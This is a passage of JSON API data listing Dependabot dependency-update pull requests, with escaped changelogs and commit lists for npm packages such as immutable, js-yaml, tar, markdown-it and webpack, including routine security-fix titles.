Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\nDates are formatted as YYYY-MM-DD.\u003c/p\u003e\n\u003ch2\u003eUnreleased\u003c/h2\u003e\n\u003ch2\u003e5.1.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in immutable\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.1.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate some files to TS by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2125\"\u003eimmutable-js/immutable-js#2125\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eIterator.ts\u003c/li\u003e\n\u003cli\u003ePairSorting.ts\u003c/li\u003e\n\u003cli\u003etoJS.ts\u003c/li\u003e\n\u003cli\u003eMath.ts\u003c/li\u003e\n\u003cli\u003eHash.ts\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eExtract CollectionHelperMethods and convert to TS by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2131\"\u003eimmutable-js/immutable-js#2131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse npm \u003ca href=\"https://docs.npmjs.com/trusted-publishers\"\u003etrusted publishing only\u003c/a\u003e to avoid token stealing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix/a11y issues by \u003ca href=\"https://github.com/lyannel\"\u003e\u003ccode\u003e@​lyannel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2136\"\u003eimmutable-js/immutable-js#2136\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDoc add Map.get signature update by \u003ca href=\"https://github.com/borracciaBlu\"\u003e\u003ccode\u003e@​borracciaBlu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2138\"\u003eimmutable-js/immutable-js#2138\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(doc):minor-issues#2132 by \u003ca href=\"https://github.com/JayMeDotDot\"\u003e\u003ccode\u003e@​JayMeDotDot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2133\"\u003eimmutable-js/immutable-js#2133\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix algolia search by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2135\"\u003eimmutable-js/immutable-js#2135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTypo in OrderedMap by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2144\"\u003eimmutable-js/immutable-js#2144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echore: Sort all imports and activate eslint import rule by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2119\"\u003eimmutable-js/immutable-js#2119\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.1.3\u003c/h2\u003e\n\u003ch3\u003eTypeScript\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: allow readonly map entry constructor by \u003ca href=\"https://github.com/septs\"\u003e\u003ccode\u003e@​septs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2123\"\u003eimmutable-js/immutable-js#2123\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cp\u003eThere has been a huge amount of changes in the documentation, mainly migrate from an autogenerated documentation from .d.ts file, to a proper documentation in markdown.\nThe playground has been included on nearly all method examples.\nWe added a page about browser extensions too: \u003ca href=\"https://immutable-js.com/browser-extension/\"\u003ehttps://immutable-js.com/browser-extension/\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/485cbe0edf3ca7bb4b9c4a80ac55ba937a291da0\"\u003e\u003ccode\u003e485cbe0\u003c/code\u003e\u003c/a\u003e 4.3.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/6ed4eb626906df788b08019061b292b90bc718cb\"\u003e\u003ccode\u003e6ed4eb6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/94bcd3c79972db4afffd8d1e5aab415880098b05\"\u003e\u003ccode\u003e94bcd3c\u003c/code\u003e\u003c/a\u003e fix new proto key injection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/faeb58b0cc71ed351dc51f672a95ae21bc859ef5\"\u003e\u003ccode\u003efaeb58b\u003c/code\u003e\u003c/a\u003e fix Prototype Pollution in mergeDeep, toJS, etc.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/37ca4170060827e5f4eaa1969d1b61e5dc5eb11d\"\u003e\u003ccode\u003e37ca417\u003c/code\u003e\u003c/a\u003e release 4.3.7 (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/2007\"\u003e#2007\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/23daf26b51ecc2805dcd9ac8534ce523397f9b62\"\u003e\u003ccode\u003e23daf26\u003c/code\u003e\u003c/a\u003e Fix issue with slice negative of filtered sequence (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/2006\"\u003e#2006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/493afba6ec17d9c999dc5a15ac80c71c6bdba1c3\"\u003e\u003ccode\u003e493afba\u003c/code\u003e\u003c/a\u003e release 4.3.6 (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1997\"\u003e#1997\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/be3cb9a7ae9a29f82c9d0c595f5f3cb957d7006c\"\u003e\u003ccode\u003ebe3cb9a\u003c/code\u003e\u003c/a\u003e Fix Repeat(\u0026lt;value\u0026gt;).equals(undefined) incorrectly returning true (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1994\"\u003e#1994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/d7664bf9d3539da8ea095f2ed08bbe1cd0d46071\"\u003e\u003ccode\u003ed7664bf\u003c/code\u003e\u003c/a\u003e generate sitemap in path that will be deployed\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/f8327b1db0bb131df8a830cf14642f6ad07ca466\"\u003e\u003ccode\u003ef8327b1\u003c/code\u003e\u003c/a\u003e upgrade next sitemap (\u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/issues/1978\"\u003e#1978\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.3.5...v4.3.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for immutable since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ht...\n\n_Description has been truncated_","html_url":"https://github.com/polaroidkidd/dle.dev/pull/164","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/polaroidkidd%2Fdle.dev/issues/164","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/164/packages"}},{"old_version":"9.2.1","new_version":"9.2.2","update_type":"patch","path":null,"pr_created_at":"2026-03-20T16:50:22.000Z","version_change":"9.2.1 → 9.2.2","issue":{"uuid":"4108938865","node_id":"PR_kwDORikVvM7MMrra","number":10,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 8 directories with 19 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-03-20T22:33:36.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-20T16:50:22.000Z","updated_at":"2026-03-20T22:33:37.000Z","time_to_close":20594,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":19,"packages":[{"name":"tar","old_version":"7.5.10","new_version":"7.5.11","repository_url":"https://github.com/isaacs/node-tar"},{"name":"markdown-it","old_version":"13.0.2","new_version":"14.1.1","repository_url":"https://github.com/markdown-it/markdown-it"},{"name":"webpack","old_version":"5.90.3","new_version":"5.104.1","repository_url":"https://github.com/webpack/webpack"},{"name":"file-type","old_version":"21.0.0","new_version":"21.3.2","repository_url":"https://github.com/sindresorhus/file-type"},{"name":"simple-git","old_version":"3.21.0","new_version":"3.32.3","repository_url":"https://github.com/steveukx/git-js"},{"name":"@octokit/endpoint","old_version":"9.0.5","new_version":"9.0.6","repository_url":"https://github.com/octokit/endpoint.js"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.2.1","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request","old_version":"8.4.0","new_version":"8.4.1","repository_url":"https://github.com/octokit/request.js"},{"name":"bn.js","old_version":"4.12.0","new_version":"4.12.3","repository_url":"https://github.com/indutny/bn.js"},{"name":"cross-spawn","old_version":"6.0.5","new_version":"6.0.6","repository_url":"https://github.com/moxystudio/node-cross-spawn"},{"name":"ejs","old_version":"3.1.9","new_version":"3.1.10","repository_url":"https://github.com/mde/ejs"},{"name":"flatted","old_version":"3.2.6","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"yauzl","old_version":"3.2.0","new_version":"3.2.1","repository_url":"https://github.com/thejoshwolfe/yauzl"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 13 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [tar](https://github.com/isaacs/node-tar) | `7.5.10` | `7.5.11` |\n| [markdown-it](https://github.com/markdown-it/markdown-it) | `13.0.2` | `14.1.1` |\n| [webpack](https://github.com/webpack/webpack) | `5.90.3` | `5.104.1` |\n| [file-type](https://github.com/sindresorhus/file-type) | `21.0.0` | `21.3.2` |\n| [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git) | `3.21.0` | `3.32.3` |\n| [@octokit/endpoint](https://github.com/octokit/endpoint.js) | `9.0.5` | `9.0.6` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `9.2.1` | `9.2.2` |\n| [@octokit/request](https://github.com/octokit/request.js) | `8.4.0` | `8.4.1` |\n| [bn.js](https://github.com/indutny/bn.js) | `4.12.0` | `4.12.3` |\n| [cross-spawn](https://github.com/moxystudio/node-cross-spawn) | `6.0.5` | `6.0.6` |\n| [ejs](https://github.com/mde/ejs) | `3.1.9` | `3.1.10` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.6` | `3.4.2` |\n| [yauzl](https://github.com/thejoshwolfe/yauzl) | `3.2.0` | `3.2.1` |\n\nBumps the npm_and_yarn group with 9 updates in the /docs directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [glob](https://github.com/isaacs/node-glob) | `10.4.5` | `10.5.0` |\n| [tar](https://github.com/isaacs/node-tar) | `7.4.3` | `7.5.12` |\n| [ws](https://github.com/websockets/ws) | `7.5.8` | `7.5.10` |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [webpack](https://github.com/webpack/webpack) | `5.91.0` | `5.105.4` |\n| [cross-spawn](https://github.com/moxystudio/node-cross-spawn) | `7.0.3` | `7.0.6` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.1` | `1.15.11` |\n| [dompurify](https://github.com/cure53/DOMPurify) | `3.3.1` | `3.3.3` |\n| [svgo](https://github.com/svg/svgo) | `3.3.2` | `3.3.3` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/cli/cloud directory: [tar](https://github.com/isaacs/node-tar).\nBumps the npm_and_yarn group with 1 update in the /packages/cli/create-strapi-app directory: [tar](https://github.com/isaacs/node-tar).\nBumps the npm_and_yarn group with 1 update in the /packages/core/content-manager directory: [markdown-it](https://github.com/markdown-it/markdown-it).\nBumps the npm_and_yarn group with 1 update in the /packages/core/data-transfer directory: [tar](https://github.com/isaacs/node-tar).\nBumps the npm_and_yarn group with 1 update in the /packages/core/upload directory: [file-type](https://github.com/sindresorhus/file-type).\nBumps the npm_and_yarn group with 1 update in the /packages/utils/upgrade directory: [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git).\n\nUpdates `tar` from 7.5.10 to 7.5.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.5.10...v7.5.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `markdown-it` from 13.0.2 to 14.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/markdown-it/markdown-it/blob/master/CHANGELOG.md\"\u003emarkdown-it's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[14.1.1] - 2026-01-11\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed regression from v13 in linkify inline rule. Specific patterns could\ncause high CPU use. Thanks to \u003ca href=\"https://github.com/ltduc147\"\u003e\u003ccode\u003e@​ltduc147\u003c/code\u003e\u003c/a\u003e for report.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.1.0] - 2024-03-19\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated CM spec compatibility to 0.31.2, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed quadratic complexity when parsing references, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/996\"\u003e#996\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eFixed quadratic output size with pathological user input in tables, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1000\"\u003e#1000\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.0.0] - 2023-12-08\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop ancient browsers support (use \u003ccode\u003e.fromCodePoint\u003c/code\u003e and other features).\u003c/li\u003e\n\u003cli\u003eRewrite to ESM (including all plugins/deps). CJS fallback still available.\nNo signatures changed, except \u003ccode\u003emarkdown-it-emoji\u003c/code\u003e plugin.\u003c/li\u003e\n\u003cli\u003eDropped \u003ccode\u003edist/\u003c/code\u003e folder from repo, build on package publish.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003epunicode.js\u003c/code\u003e as external dependency.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eHtml tokens inside img alt are now rendered as their original text, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/896\"\u003e#896\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHardbreaks inside img alt are now rendered as newlines.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/b4a9b659ef5734223731cfaa3ad5eacc6fc22918\"\u003e\u003ccode\u003eb4a9b65\u003c/code\u003e\u003c/a\u003e 14.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26\"\u003e\u003ccode\u003e4b4bbca\u003c/code\u003e\u003c/a\u003e Fixed perf regression in linkify-it wrapper\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d2782d892a51201b25d3eeab172201ad5a53a24c\"\u003e\u003ccode\u003ed2782d8\u003c/code\u003e\u003c/a\u003e Add supplementary example-driven documentation (\u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1092\"\u003e#1092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/0fe7ccb4b7f30236fb05f623be6924961d296d3d\"\u003e\u003ccode\u003e0fe7ccb\u003c/code\u003e\u003c/a\u003e 14.1.0 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/a367c44154d6c906c8652ed779af6a21f7eaed2e\"\u003e\u003ccode\u003ea367c44\u003c/code\u003e\u003c/a\u003e Fix typo in comments of text.mjs (\u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1015\"\u003e#1015\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/7ad81799725ef19627241f002fb1fa9cbd6a2a37\"\u003e\u003ccode\u003e7ad8179\u003c/code\u003e\u003c/a\u003e add changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/5e900639542bb36501ee9e960c07bfaa529431c9\"\u003e\u003ccode\u003e5e90063\u003c/code\u003e\u003c/a\u003e simplify logic in scanDelims\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d7ce5ec66d3babcd165d432b68b3c55000349ccf\"\u003e\u003ccode\u003ed7ce5ec\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e from notriddle/spec-0.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/0bfc57de427b349865c4d85dccc7d4da00bca53f\"\u003e\u003ccode\u003e0bfc57d\u003c/code\u003e\u003c/a\u003e Update spec to 0.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/cd2477863fdcc182cc8739e9bedc7363acb344d8\"\u003e\u003ccode\u003ecd24778\u003c/code\u003e\u003c/a\u003e Update to comply with spec 0.31.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/markdown-it/markdown-it/compare/13.0.2...14.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack` from 5.90.3 to 5.104.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.104.1\u003c/h2\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.104.0\u003c/h2\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.103.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eDotenvPlugin\u003c/code\u003e and top level \u003ccode\u003edotenv\u003c/code\u003e option to enable this plugin\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eWebpackManifestPlugin\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdded support the \u003ccode\u003eignoreList\u003c/code\u003e option in devtool plugins\u003c/li\u003e\n\u003cli\u003eAllow to use custom javascript parse function\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and 